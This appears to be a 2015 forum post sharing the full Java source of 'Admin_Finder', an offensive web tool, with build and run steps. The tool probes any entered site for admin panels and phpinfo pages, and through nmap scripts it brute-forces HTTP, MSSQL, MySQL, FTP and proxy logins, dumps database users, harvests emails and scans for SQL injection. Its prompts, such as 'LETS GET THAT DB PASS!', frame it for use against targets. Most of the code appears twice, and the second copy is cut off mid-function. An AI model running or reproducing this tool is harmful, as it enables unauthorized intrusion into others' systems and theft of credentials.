Void
03-14-2015, 02:01 PM
import java.net.URL;
import java.net.MalformedURLException;
import java.util.ArrayList;
import java.io.*;
import java.util.Scanner;
//Must save as Admin_Finder.java
//Compile with command: javac Admin_Finder.java
//To have all features of this script you must have the lastest version of Nmap.
//Run script with command: java Admin_Finder
//For linux users i recommend dont use apt-get version of nmap, missing nse scripts.
//Uninstall nmap, download package and install nmap-6.01
//Enjoy the advanced admin finder :}
public class Admin_Finder {
public static String readInput()
{
try
{
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
String Input = in.readLine();
Input = Input.trim();
return Input;
}
catch( IOException e)
{
}
return "";
}
public static void Info() {
String[] info = {
"phpinfo","php-info","php_info","phpdetails","php-details","php_details",
"phpinfo.php","php-info.php","phpdetails.php","php-details.php","php_details.php",
"phpinformation","php-information","php_information","test",
"phpinformation.php","php-information.php","php_information.php","test.php", "php.php",
"phpinfo/phpinfo.php", "phpinfo/php.php", "phpinfo/php_info.php", "phpinfo/php-info.php", "phpinfo/phpdetails.php", "phpinfo/php-details.php", "phpinfo/php_details.php",
"php-info/phpinfo.php", "php-info/php_info.php", "php-info/php_info.php", "php-info/php.php",
"php-info/phpdetails.php", "php-info/php-details.php", "php-info/php_details.php" ,
"php_info/phpinfo.php", "php_info/php-info.php", "php_info/php_info.php", "php_info/php.php",
"php_info/phpdetails.php", "php_info/php_details.php", "php_info/php-details.php"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < info.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + info[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + info[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + info[i] + " <-- Found");
panels.add(url + "" + info[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible PHP_Info Pages:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] PHP_Info was not Found. ");
}
}
catch(IOException e) {}
}
public static void PHP()
{
String[] php = {
"admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/",
"memberadmin/","administratorlogin/","adm/","admin/account.php","admin/index.php","admin/login.php","admin/admin.php","admin/account.php",
"admin_area/admin.php","admin_area/login.php","siteadmin/login.php","siteadmin/index.php","siteadmin/login.html","admin/account.html","admin/index.html","admin/login.html","admin/admin.html",
"admin_area/index.php","bb-admin/index.php","bb-admin/login.php","bb-admin/admin.php","admin/home.php","admin_area/login.html","admin_area/index.html",
"admin/controlpanel.php","admin.php","admincp/index.asp","admincp/login.asp","admincp/index.html","admin/account.html","adminpanel.html","webadmin.html",
"webadmin/index.html","webadmin/admin.html","webadmin/login.html","admin/admin_login.html","admin_login.html","panel-administracion/login.html",
"admin/cp.php","cp.php","administrator/index.php","administrator/login.php","nsw/admin/login.php","webadmin/login.php","admin/admin_login.php","admin_login.php",
"administrator/account.php","administrator.php","admin_area/admin.html","pages/admin/admin-login.php","admin/admin-login.php","admin-login.php",
"bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","login.php","modelsearch/login.php","moderator.php","moderator/login.php",
"moderator/admin.php","account.php","pages/admin/admin-login.html","admin/admin-login.html","admin-login.html","controlpanel.php","admincontrol.php",
"admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","rcjakar/admin/login.php","adminarea/index.html","adminarea/admin.html",
"webadmin.php","webadmin/index.php","webadmin/admin.php","admin/controlpanel.html","admin.html","admin/cp.html","cp.html","adminpanel.php","moderator.html",
"administrator/index.html","administrator/login.html","user.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html",
"moderator/login.html","adminarea/login.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html",
"admincontrol/login.html","adm/index.html","adm.html","moderator/admin.html","user.php","account.html","controlpanel.html","admincontrol.html",
"panel-administracion/login.php","wp-login.php","adminLogin.php","admin/adminLogin.php","home.php","admin.php","adminarea/index.php",
"adminarea/admin.php","adminarea/login.php","panel-administracion/index.php","panel-administracion/admin.php","modelsearch/index.php",
"modelsearch/admin.php","admincontrol/login.php","adm/admloginuser.php","admloginuser.php","admin2.php","admin2/login.php","admin2/index.php",
"adm/index.php","adm.php","affiliate.php","adm_auth.php","memberadmin.php","administratorlogin.php"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < php.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + php[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + php[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + php[i] + " <-- Found");
panels.add(url + "" + php[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible Panels:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] Panel was not Found. ");
}
}
catch(IOException e) {}
}
public static void ASP() {
String[] asp = {
"admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/",
"memberadmin/","administratorlogin/","adm/","account.asp","admin/account.asp","admin/index.asp","admin/login.asp","admin/admin.asp",
"admin_area/admin.asp","admin_area/login.asp","admin/account.html","admin/index.html","admin/login.html","admin/admin.html",
"admin_area/admin.html","admin_area/login.html","admin_area/index.html","admin_area/index.asp","bb-admin/index.asp","bb-admin/login.asp","bb-admin/admin.asp",
"bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","admin/controlpanel.html","admin.html","admin/cp.html","cp.html",
"administrator/index.html","administrator/login.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator.html",
"moderator/login.html","moderator/admin.html","account.html","controlpanel.html","admincontrol.html","admin_login.html","panel-administracion/login.html",
"admin/home.asp","admin/controlpanel.asp","admin.asp","pages/admin/admin-login.asp","admin/admin-login.asp","admin-login.asp","admin/cp.asp","cp.asp",
"administrator/account.asp","administrator.asp","login.asp","modelsearch/login.asp","moderator.asp","moderator/login.asp","administrator/login.asp",
"moderator/admin.asp","controlpanel.asp","admin/account.html","adminpanel.html","webadmin.html","pages/admin/admin-login.html","admin/admin-login.html",
"webadmin/index.html","webadmin/admin.html","webadmin/login.html","user.asp","user.html","admincp/index.asp","admincp/login.asp","admincp/index.html",
"admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","adminarea/index.html","adminarea/admin.html","adminarea/login.html",
"panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admin/admin_login.html",
"admincontrol/login.html","adm/index.html","adm.html","admincontrol.asp","admin/account.asp","adminpanel.asp","webadmin.asp","webadmin/index.asp",
"webadmin/admin.asp","webadmin/login.asp","admin/admin_login.asp","admin_login.asp","panel-administracion/login.asp","adminLogin.asp",
"admin/adminLogin.asp","home.asp","admin.asp","adminarea/index.asp","adminarea/admin.asp","adminarea/login.asp","admin-login.html",
"panel-administracion/index.asp","panel-administracion/admin.asp","modelsearch/index.asp" , "modelsearch/admin.asp","administrator/index.asp",
"admincontrol/login.asp","adm/admloginuser.asp","admloginuser.asp","admin2.asp","admin2/login.asp","admin2/index.asp","adm/index.asp",
"adm.asp","affiliate.asp","adm_auth.asp","memberadmin.asp","administratorlogin.asp","siteadmin/login.asp","siteadmin/index.asp","siteadmin/login.html"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < asp.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + asp[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + asp[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + asp[i] + " <-- Found");
panels.add(url + "" + asp[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible Panels:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] Panel was not Found. ");
}
}
catch(IOException e) {}
}
public static void CFM() {
String[] cfm = {
"admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/",
"memberadmin/","administratorlogin/","adm/","account.cfm","admin/account.cfm","admin/index.cfm","admin/login.cfm","admin/admin.cfm",
"admin_area/admin.cfm","admin_area/login.cfm","admin/account.html","admin/index.html","admin/login.html","admin/admin.html",
"admin_area/admin.html","admin_area/login.html","admin_area/index.html","admin_area/index.cfm","bb-admin/index.cfm","bb-admin/login.cfm","bb-admin/admin.cfm",
"bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","admin/controlpanel.html","admin.html","admin/cp.html","cp.html",
"administrator/index.html","administrator/login.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator.html",
"moderator/login.html","moderator/admin.html","account.html","controlpanel.html","admincontrol.html","admin_login.html","panel-administracion/login.html",
"admin/home.cfm","admin/controlpanel.cfm","admin.cfm","pages/admin/admin-login.cfm","admin/admin-login.cfm","admin-login.cfm","admin/cp.cfm","cp.cfm",
"administrator/account.cfm","administrator.cfm","login.cfm","modelsearch/login.cfm","moderator.cfm","moderator/login.cfm","administrator/login.cfm",
"moderator/admin.cfm","controlpanel.cfm","admin/account.html","adminpanel.html","webadmin.html","pages/admin/admin-login.html","admin/admin-login.html",
"webadmin/index.html","webadmin/admin.html","webadmin/login.html","user.cfm","user.html","admincp/index.cfm","admincp/login.cfm","admincp/index.html",
"admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","adminarea/index.html","adminarea/admin.html","adminarea/login.html",
"panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admin/admin_login.html",
"admincontrol/login.html","adm/index.html","adm.html","admincontrol.cfm","admin/account.cfm","adminpanel.cfm","webadmin.cfm","webadmin/index.cfm",
"webadmin/admin.cfm","webadmin/login.cfm","admin/admin_login.cfm","admin_login.cfm","panel-administracion/login.cfm","adminLogin.cfm",
"admin/adminLogin.cfm","home.cfm","admin.cfm","adminarea/index.cfm","adminarea/admin.cfm","adminarea/login.cfm","admin-login.html",
"panel-administracion/index.cfm","panel-administracion/admin.cfm","modelsearch/index.cfm","modelsearch/admin.cfm","administrator/index.cfm",
"admincontrol/login.cfm","adm/admloginuser.cfm","admloginuser.cfm","admin2.cfm","admin2/login.cfm","admin2/index.cfm","adm/index.cfm",
"adm.cfm","affiliate.cfm","adm_auth.cfm","memberadmin.cfm","administratorlogin.cfm","siteadmin/login.cfm","siteadmin/index.cfm","siteadmin/login.html"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < cfm.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + cfm[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + cfm[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + cfm[i] + " <-- Found");
panels.add(url + "" + cfm[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible Panels:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] Panel was not Found. ");
}
}
catch(IOException e) {}
}
public static void brute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("HTTP-AUTH-BRUTE-FORCE" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script http-brute -p 80 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void FormBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("HTTP-FORUM-AUTH-BRUTE-FORCE" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script http-form-brute -p 80 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void accounts() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("CHECKING FOR DEFAULT ACCOUNTS ON WEB APP." );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -p80 --script http-default-accounts " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void emails() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("LETS PARSE THESE PAGES FOR SOME EMAILS!" );
System.out.print("Enter Target:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script=http-email-harvest" + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void ProxyBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("NEED AN EXTRA PROXY? :}" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script http-proxy-brute -p 8080 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void mssql445() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("MSSQL-BRUTE-FORCE-ON-PORT-445" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=/nselib/data/usernames.lst,passdb=/nselib/data/passwords.lst " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void mssql1433() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("MSSQL-BRUTE-FORCE-ON-PORT-1433" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -p 1433 --script ms-sql-brute --script-args userdb=/nselib/data/usernames.lst,passdb=/nselib/data/passwords.lst " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void MysqlBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("LETS GET THAT DB PASS!" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script=mysql-brute " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void MysqlUserDump() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("WHO IS USING THIS DB?" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -sV --script=mysql-users " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void SqlInject() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("SQL-INJECTION-SCAN" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -sV --script=sql-injection " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void FtpBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("FTP-BRUTE-FORCE" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script ftp-brute -p 21 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void NmapScan() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("NORMAL-NMAP-SCAN." );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -v " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void main(String args[])
{
InputStreamReader reader =
new InputStreamReader (System.in );
BufferedReader in =
new BufferedReader (reader );
boolean done = false;
System.out.println("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" );
System.out.println("~ ADMIN_FINDER ~" );
System.out.println("~ CODED BY SP3CT ~" );
System.out.println("~ ~" );
System.out.println("~ @Team_Digi7al ~" );
System.out.println("~ ~" );
System.out.println("~ Sp3ctrum L0GIC ~" );
System.out.println("~ Th3P0nyWizard Ichi ~" );
System.out.println("~ Shr00mi3 DR_7hor ~" );
System.out.println("~ Kalypto Th1nkT0ken ~" );
System.out.println("~ Unsp0ken n3tM0nkey ~" );
System.out.println("~ ~" );
System.out.println("~ USAGE: ~" );
System.out.println("~ [+] P - .php Scan ~" );
System.out.println("~ [+] A - .asp Scan ~" );
System.out.println("~ [+] C - .cfm Scan ~" );
System.out.println("~ [+] I - Phpinfo_Scan ~" );
System.out.println("~ [+] N - Nmap_Scan ~" );
System.out.println("~ [+] B - Brute_Panel ~" );
System.out.println("~ [+] F - Forum_Brute ~" );
System.out.println("~ [+] D - Default_Accounts ~" );
System.out.println("~ [+] E - Grab_Emails ~" );
System.out.println("~ [+] W - Proxy_Brute ~" );
System.out.println("~ [+] S - Mssql_445_Brute ~" );
System.out.println("~ [+] L - Mssql_1433_Brute ~" );
System.out.println("~ [+] O - Mysql_Brute ~" );
System.out.println("~ [+] X - Mysql_User_Dump ~" );
System.out.println("~ [+] Z - Sqli_Scan ~" );
System.out.println("~ [+] U - FTP_Brute ~" );
System.out.println("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" );
String input = readInput();
input = input.toUpperCase();
char ch = input.charAt(0);
switch ( ch )
{
case 'I':
Info();
break;
case 'N':
NmapScan();
break;
case 'U':
FtpBrute();
break;
case 'Z':
SqlInject();
break;
case 'X':
MysqlUserDump();
break;
case 'O':
MysqlBrute();
break;
case 'L':
mssql1433();
break;
case 'S':
mssql445();
break;
case 'W':
ProxyBrute();
break;
case 'E':
emails();
break;
case 'D':
accounts();
break;
case 'F':
FormBrute();
break;
case 'B':
brute();
break;
case 'P':
PHP();
break;
case 'A':
ASP();
break;
case 'C':
CFM();
break;
case 'Q':
done = true;
break;
default:
System.out.println("" );
System.out.println("Please choose a valid choice." );
}
System.out.println("" );
System.out.print("Press Enter to return to Terminal" );
readInput();
}
}
Features:
[+] .php Panel scan
[+] .asp Panel scan
[+] .cfm Panel scan
[+] Phpinfo scan
[+] Nmap Single Target scan
[+] Brute Force Attack on Panel
[+] Http Forum Brute
[+] Default Account check on Web Applications
[+] Email Harvest
[+] Proxy Auth. Brute
[+] Mssql port 445 Brute
[+] Mssql port 1433 Brute
[+] Mysql Auth. Brute
[+] Sql Injection scan
[+] Ftp Auth. Brute
Now to have the full features of this script, you must have latest version of nmap installed on your computer. This script uses some of nmaps .nse scripts to run the features. But just as important you must have Java Installed. Linux users shouldnt have a problem with this, but windows users need to Install Java if not already installed. Also Java JDK needs to be installed not JRE so remember this when your downloading window's users. JDK!!!
Nmap Download:
http://nmap.org/download.html
Java Download:
http://www.oracle.com/technetwork/java/j...index.html
Java admin scanner code:
Finder - Pastebin.com (http://pastebin.com/G2LdsKC0)
~1) Now copy and paste the code to a text file and name it Admin_Finder.java and save. Remember you must save it as Admin_Finder.java
~2) Open cmd or terminal and cd to the directory you saved it in.
~3) Compile the java code with the command javac Admin_Finder.java
~4) After compiling you should see a Admin_Finder.class file, that means everything compiled right and is ready to go.
~5) Finally install Nmap, make sure its working by typing Nmap into your cmd or terminal and help screen will show, then cd back to your java .class file in cmd or Terminal and to run Script type java Admin_Finder
import java.net.MalformedURLException;
import java.util.ArrayList;
import java.io.*;
import java.util.Scanner;
//Must save as Admin_Finder.java
//Compile with command: javac Admin_Finder.java
//To have all features of this script you must have the lastest version of Nmap.
//Run script with command: java Admin_Finder
//For linux users i recommend dont use apt-get version of nmap, missing nse scripts.
//Uninstall nmap, download package and install nmap-6.01
//Enjoy the advanced admin finder :}
public class Admin_Finder {
public static String readInput()
{
try
{
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
String Input = in.readLine();
Input = Input.trim();
return Input;
}
catch( IOException e)
{
}
return "";
}
public static void Info() {
String[] info = {
"phpinfo","php-info","php_info","phpdetails","php-details","php_details",
"phpinfo.php","php-info.php","phpdetails.php","php-details.php","php_details.php",
"phpinformation","php-information","php_information","test",
"phpinformation.php","php-information.php","php_information.php","test.php", "php.php",
"phpinfo/phpinfo.php", "phpinfo/php.php", "phpinfo/php_info.php", "phpinfo/php-info.php", "phpinfo/phpdetails.php", "phpinfo/php-details.php", "phpinfo/php_details.php",
"php-info/phpinfo.php", "php-info/php_info.php", "php-info/php_info.php", "php-info/php.php",
"php-info/phpdetails.php", "php-info/php-details.php", "php-info/php_details.php" ,
"php_info/phpinfo.php", "php_info/php-info.php", "php_info/php_info.php", "php_info/php.php",
"php_info/phpdetails.php", "php_info/php_details.php", "php_info/php-details.php"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < info.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + info[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + info[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + info[i] + " <-- Found");
panels.add(url + "" + info[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible PHP_Info Pages:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] PHP_Info was not Found. ");
}
}
catch(IOException e) {}
}
public static void PHP()
{
String[] php = {
"admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/",
"memberadmin/","administratorlogin/","adm/","admin/account.php","admin/index.php","admin/login.php","admin/admin.php","admin/account.php",
"admin_area/admin.php","admin_area/login.php","siteadmin/login.php","siteadmin/index.php","siteadmin/login.html","admin/account.html","admin/index.html","admin/login.html","admin/admin.html",
"admin_area/index.php","bb-admin/index.php","bb-admin/login.php","bb-admin/admin.php","admin/home.php","admin_area/login.html","admin_area/index.html",
"admin/controlpanel.php","admin.php","admincp/index.asp","admincp/login.asp","admincp/index.html","admin/account.html","adminpanel.html","webadmin.html",
"webadmin/index.html","webadmin/admin.html","webadmin/login.html","admin/admin_login.html","admin_login.html","panel-administracion/login.html",
"admin/cp.php","cp.php","administrator/index.php","administrator/login.php","nsw/admin/login.php","webadmin/login.php","admin/admin_login.php","admin_login.php",
"administrator/account.php","administrator.php","admin_area/admin.html","pages/admin/admin-login.php","admin/admin-login.php","admin-login.php",
"bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","login.php","modelsearch/login.php","moderator.php","moderator/login.php",
"moderator/admin.php","account.php","pages/admin/admin-login.html","admin/admin-login.html","admin-login.html","controlpanel.php","admincontrol.php",
"admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","rcjakar/admin/login.php","adminarea/index.html","adminarea/admin.html",
"webadmin.php","webadmin/index.php","webadmin/admin.php","admin/controlpanel.html","admin.html","admin/cp.html","cp.html","adminpanel.php","moderator.html",
"administrator/index.html","administrator/login.html","user.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html",
"moderator/login.html","adminarea/login.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html",
"admincontrol/login.html","adm/index.html","adm.html","moderator/admin.html","user.php","account.html","controlpanel.html","admincontrol.html",
"panel-administracion/login.php","wp-login.php","adminLogin.php","admin/adminLogin.php","home.php","admin.php","adminarea/index.php",
"adminarea/admin.php","adminarea/login.php","panel-administracion/index.php","panel-administracion/admin.php","modelsearch/index.php",
"modelsearch/admin.php","admincontrol/login.php","adm/admloginuser.php","admloginuser.php","admin2.php","admin2/login.php","admin2/index.php",
"adm/index.php","adm.php","affiliate.php","adm_auth.php","memberadmin.php","administratorlogin.php"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < php.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + php[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + php[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
